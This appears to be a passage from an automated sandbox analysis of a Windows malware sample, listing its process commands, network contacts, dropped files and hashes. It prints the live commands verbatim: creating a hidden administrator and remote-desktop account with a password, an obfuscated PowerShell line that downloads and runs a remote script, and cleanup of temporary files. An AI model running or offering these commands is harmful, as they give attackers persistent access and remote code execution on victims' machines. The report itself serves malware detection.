C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WVXHFeyt

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WVXHFeyt

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 platform.wondershare.com udp
N/A 47.91.67.36:80 platform.wondershare.com tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.kabeltex.nl udp
N/A 82.151.33.2:8080 speedtest.kabeltex.nl tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

memory/3904-114-0x0000000000C90000-0x0000000000C91000-memory.dmp

memory/3904-116-0x0000000005BC0000-0x0000000005BF1000-memory.dmp

memory/3904-117-0x0000000005C00000-0x0000000005C01000-memory.dmp

memory/2412-118-0x0000000000000000-mapping.dmp

memory/2396-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

memory/2412-123-0x00000192D1BC0000-0x00000192D1BC2000-memory.dmp

memory/2412-124-0x00000192D1E90000-0x00000192D213A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

memory/2412-127-0x00000192D1BC3000-0x00000192D1BC5000-memory.dmp

memory/2412-128-0x00000192D1BC5000-0x00000192D1BC6000-memory.dmp

memory/2412-129-0x00000192D1BC6000-0x00000192D1BC7000-memory.dmp

memory/3500-130-0x0000000000000000-mapping.dmp

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config

MD5 ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1 ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA256 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA512 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b

memory/3292-134-0x0000000000000000-mapping.dmp

memory/3292-139-0x0000020B75C40000-0x0000020B75C41000-memory.dmp

memory/3500-142-0x0000000003140000-0x0000000003142000-memory.dmp

memory/3292-143-0x0000020B75CE0000-0x0000020B75CE2000-memory.dmp

memory/3292-145-0x0000020B75CE3000-0x0000020B75CE5000-memory.dmp

memory/3292-144-0x0000020B75F70000-0x0000020B75F71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/2460-151-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline

MD5 1bf5abca04dfa636d13c54b3fa9b3e86
SHA1 86b76191802aedaec09c009c39ed93fbcbea82c4
SHA256 77191771e93606772bdcd1707b337d80a76c7346ea0753d8d5ee2a98607d0826
SHA512 a295f20c3dc2a4dd18acb880940599ac275be1d4261e75c1b7ae2fee0fb28c6e65f23185e1f65179ac3467dd72769e4cc0ef2039cfc7b758aa6f355e0c1444bc

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/3972-154-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP

MD5 d003565ffac3c9d41df58b063e7ba3a0
SHA1 28134aeacf9867ce14300ff2376923de29161616
SHA256 b994ca66addbbc61e7c9959f17e3afac0132a32ced45e809f53ef993635d1363
SHA512 387c39aaf40125af803871e744970bcd2fa357a9e642b8d8a98f7e01ef128eab58543a4e1aa5d3540d2fbfc69c1d9c98c957eb5e2dce8a09dcab3ff3fcf3163d

C:\Users\Admin\AppData\Local\Temp\RES2541.tmp

MD5 964caa4f02b9565510e15c5ea910775e
SHA1 5edbecc35dc0f60ac7bdc585f9fd5cfa01a1a4c1
SHA256 91046f2ea431347ad3b742a063d6e121b4c31f5178249270eb5af85d36a2df13
SHA512 bb157a5259ed96e04cf46d97aed788e267351e2be6c13b0a6209add182d56d314813bb02f8ebbc41ac3f9ba288fc5dd6604930be0ac118bf6c97366193e99559

C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.dll

MD5 471bdee090cb60e599f4a2d690d48217
SHA1 d368e433a07f421a88241b7481c80c3fc223759a
SHA256 a2e1a1b98b89f933e167713e797115e8abbe36e1442a439b3818fb54bd2bacf8
SHA512 da02b03573279cf5208d2386a44a87bd6c1c04f0b549d381952898e4463f290aa9d1f6259d15a5d60208e36041dbdea8c68f0475993ed8e1f84311e738342fe5

memory/3292-158-0x0000020B75C90000-0x0000020B75C91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/3292-160-0x0000020B75CE6000-0x0000020B75CE8000-memory.dmp

memory/3292-165-0x0000020B75CE8000-0x0000020B75CE9000-memory.dmp

memory/3292-166-0x0000020B763D0000-0x0000020B763D1000-memory.dmp

memory/3292-167-0x0000020B76760000-0x0000020B76761000-memory.dmp

memory/4028-174-0x0000000000000000-mapping.dmp

memory/4028-184-0x0000021D06643000-0x0000021D06645000-memory.dmp

memory/4028-183-0x0000021D06640000-0x0000021D06642000-memory.dmp

memory/4028-203-0x0000021D06646000-0x0000021D06648000-memory.dmp

memory/4144-216-0x0000000000000000-mapping.dmp

memory/4144-225-0x000001BE87CD3000-0x000001BE87CD5000-memory.dmp

memory/4144-224-0x000001BE87CD0000-0x000001BE87CD2000-memory.dmp

memory/4028-223-0x0000021D06648000-0x0000021D0664A000-memory.dmp

memory/4404-254-0x0000000000000000-mapping.dmp

memory/4144-266-0x000001BE87CD6000-0x000001BE87CD8000-memory.dmp

memory/4144-267-0x000001BE87CD8000-0x000001BE87CDA000-memory.dmp

memory/4404-269-0x00000201FE4A0000-0x00000201FE4A2000-memory.dmp

memory/4404-270-0x00000201FE4A3000-0x00000201FE4A5000-memory.dmp

memory/4404-301-0x00000201FE4A6000-0x00000201FE4A8000-memory.dmp

memory/4404-302-0x00000201FE4A8000-0x00000201FE4AA000-memory.dmp

memory/4824-312-0x0000000000000000-mapping.dmp

memory/4844-313-0x0000000000000000-mapping.dmp

memory/4864-314-0x0000000000000000-mapping.dmp

memory/5044-351-0x0000000000000000-mapping.dmp

memory/5064-352-0x0000000000000000-mapping.dmp

memory/5096-355-0x0000000000000000-mapping.dmp

memory/5112-356-0x0000000000000000-mapping.dmp

memory/3960-357-0x0000000000000000-mapping.dmp

memory/2684-358-0x0000000000000000-mapping.dmp

memory/3700-359-0x0000000000000000-mapping.dmp

memory/3612-360-0x0000000000000000-mapping.dmp

memory/4112-361-0x0000000000000000-mapping.dmp

memory/4124-362-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

memory/4308-365-0x0000000000000000-mapping.dmp

memory/4328-366-0x0000000000000000-mapping.dmp

memory/4216-367-0x0000000000000000-mapping.dmp

memory/4148-368-0x0000000000000000-mapping.dmp

memory/4000-369-0x0000000000000000-mapping.dmp

memory/4428-370-0x0000000000000000-mapping.dmp

memory/4532-371-0x0000000000000000-mapping.dmp

memory/4552-372-0x0000000000000000-mapping.dmp

memory/4620-373-0x0000000000000000-mapping.dmp

memory/4644-374-0x0000000000000000-mapping.dmp

memory/4508-375-0x0000000000000000-mapping.dmp

memory/4504-376-0x0000000000000000-mapping.dmp

memory/4752-377-0x0000000000000000-mapping.dmp

memory/4708-378-0x0000000000000000-mapping.dmp

memory/4856-379-0x0000000000000000-mapping.dmp

memory/4880-380-0x0000000000000000-mapping.dmp

memory/4880-391-0x000001BBB9EA0000-0x000001BBB9EA2000-memory.dmp

memory/4880-392-0x000001BBB9EA3000-0x000001BBB9EA5000-memory.dmp

memory/4880-395-0x000001BBB9EA6000-0x000001BBB9EA8000-memory.dmp

memory/4880-446-0x000001BBB9EA8000-0x000001BBB9EA9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Setup.zip

MD5 36f178576dcb8db35d6f06448b1eb510
SHA1 62277c90cc2b1bb81b36571037afe5081b0605d5
SHA256 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA512 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96

memory/4164-462-0x0000000000000000-mapping.dmp

memory/4000-463-0x0000000000000000-mapping.dmp